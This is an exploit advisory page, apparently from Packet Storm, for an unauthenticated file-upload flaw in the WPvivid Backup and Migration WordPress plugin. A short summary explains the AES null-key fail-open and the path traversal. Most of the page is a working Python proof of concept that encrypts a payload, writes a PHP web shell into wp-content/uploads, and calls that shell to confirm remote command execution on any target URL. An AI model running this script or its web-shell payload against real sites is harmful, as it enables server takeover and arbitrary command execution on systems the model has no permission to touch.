📄 WordPress WPvivid Backup and Migration 0.9.123 Shell Upload

🗓️ 27 Feb 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 167 Views

Unauthenticated file upload in WordPress WPvivid plugin enables code execution via fail-open and path traversal.

Reporter	Title	Published	Views	Family All 29
GithubExploit	Exploit for CVE-2026-1357	13 Feb 202609:12	–	githubexploit
GithubExploit	Mephisto	21 May 202605:06	–	githubexploit
GithubExploit	Exploit for CVE-2026-1357	25 Feb 202606:37	–	githubexploit
GithubExploit	Exploit for CVE-2026-1357	15 Apr 202605:02	–	githubexploit
GithubExploit	Exploit for Authentication Bypass by Spoofing in Booster Booster_For_Woocommerce	16 Feb 202612:12	–	githubexploit
GithubExploit	CVEsWorpriss	23 May 202601:52	–	githubexploit
GithubExploit	Exploit for CVE-2026-1357	10 Mar 202622:23	–	githubexploit
GithubExploit	Exploit for CVE-2026-1357	14 Feb 202605:15	–	githubexploit
GithubExploit	Exploit for CVE-2026-1357	10 Feb 202619:38	–	githubexploit
GithubExploit	Exploit for CVE-2026-1357	11 Feb 202615:26	–	githubexploit

=============================================================================================================================================
    | # Title     : WordPress WPvivid Backup and Migration 0.9.123 Unauthenticated Arbitrary File Upload Leading to RCE                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://wpvivid.com/                                                                                                        |
    =============================================================================================================================================
    
    [+] Summary    : A critical vulnerability in the WPvivid Backup & Migration plugin for WordPress allows unauthenticated attackers to upload arbitrary files, potentially resulting in Remote Code Execution (RCE).
                     The issue stems from a cryptographic fail‑open condition combined with insufficient file path validation. When RSA decryption fails, the plugin continues processing encrypted data 
    				 using a predictable AES configuration (null key and null IV). This bypasses intended authentication controls.
                     Additionally, improper validation of file paths enables directory traversal, allowing attackers to write files outside the intended backup directory — including 
    				 into wp-content/uploads/. If PHP execution is permitted in that directory, this can lead to full server compromise.
    
    
    [+] POC : 
    
    #!/usr/bin/env python3
    
    import argparse
    import base64
    import hashlib
    import json
    import random
    import string
    import sys
    from urllib.parse import urljoin
    
    import requests
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad
    
    
    def banner():
        print(r"""
       ╔══════════════════════════════════════════════════════════╗
       ║           BY indoushka  WPvivid RCE PoC                  ║
       ║        WPvivid Backup & Migration <= 0.9.123             ║
       ╚══════════════════════════════════════════════════════════╝
        """)
    
    
    SHELL_CONTENT = '<?php system($_GET["cmd"]); ?>'
    _rand_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=24))
    UPLOAD_PATH = f'../uploads/{_rand_name}.php'
    
    
    def generate_payload() -> str:
        """
        Generates the encrypted exploit payload.
        """    
        null_key = b"\x00" * 16
        null_iv = b"\x00" * 16
        cipher = AES.new(null_key, AES.MODE_CBC, iv=null_iv)
        params = {
            "backup_id": "1",
            "name": UPLOAD_PATH,
            "data": base64.b64encode(SHELL_CONTENT.encode()).decode(),
            "offset": 0,
            "file_size": len(SHELL_CONTENT),
            "total_size": len(SHELL_CONTENT),
            "index": 0,
            "md5": hashlib.md5(SHELL_CONTENT.encode()).hexdigest(),
            "type": "backup",
            "status": "running"
        }
        plaintext = json.dumps(params).encode()
        encrypted = cipher.encrypt(pad(plaintext, AES.block_size))
        fake_key = b"ABC"
        packet = (
            format(len(fake_key), "03x").encode()      
            + fake_key
            + format(len(encrypted), "016x").encode()   
            + encrypted
        )
    
        return base64.b64encode(packet).decode()
    
    
    def exploit(target_url: str, verify_cmd: str) -> bool:
        """
        Sends the exploit payload to the target and verifies RCE.
        """
        target_url = target_url.rstrip("/") + "/"
    
        print(f"[*] Target       : {target_url}")
        print(f"[*] Upload path  : {UPLOAD_PATH}")
        print(f"[*] Verify cmd   : {verify_cmd}")
        print()
        print("[+] Generating encrypted payload (AES-128-CBC, null key + null IV)...")
        payload = generate_payload()
        print(f"[+] Payload size : {len(payload)} bytes (base64)")
        print("[+] Sending exploit via wpvivid_action=send_to_site ...")
        try:
            resp = requests.post(
                target_url,
                data={
                    "wpvivid_action": "send_to_site",
                    "wpvivid_content": payload,
                },
                timeout=30,
            )
            print(f"[+] Response     : {resp.status_code}")
            if resp.text:
                print(f"[+] Body         : {resp.text[:500]}")
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")
            return False
    
        shell_filename = UPLOAD_PATH.split("/")[-1]
        shell_url = urljoin(target_url, f"wp-content/uploads/{shell_filename}")
        verify_url = f"{shell_url}?cmd={verify_cmd}"
    
        print()
        print(f"[+] Verifying RCE at: {verify_url}")
        try:
            verify_resp = requests.get(verify_url, timeout=15)
            if verify_resp.status_code == 200 and verify_resp.text.strip():
                print(f"[✓] RCE Confirmed!")
                print(f"[✓] Output:\n{verify_resp.text.strip()}")
                return True
            else:
                print(f"[!] Shell responded with status {verify_resp.status_code}")
                print(f"[!] Body: {verify_resp.text[:200]}")
                return False
        except requests.RequestException as e:
            print(f"[-] Verification failed: {e}")
            return False
    
    def main():
        banner()
    
        parser = argparse.ArgumentParser(
            description="CVE-2026-1357 WPvivid Backup & Migration RCE PoC"
        )
        parser.add_argument(
            "-u", "--url",
            required=True,
            help="Target WordPress URL (e.g. http://localhost)"
        )
        parser.add_argument(
            "-c", "--cmd",
            default="id",
            help="Command to execute for RCE verification (default: id)"
        )
    
        args = parser.parse_args()
    
        success = exploit(args.url, args.cmd)
        sys.exit(0 if success else 1)
    
    
    if __name__ == "__main__":
        main()
    
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

27 Feb 2026 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 3.19.8

EPSS0.1582

SSVC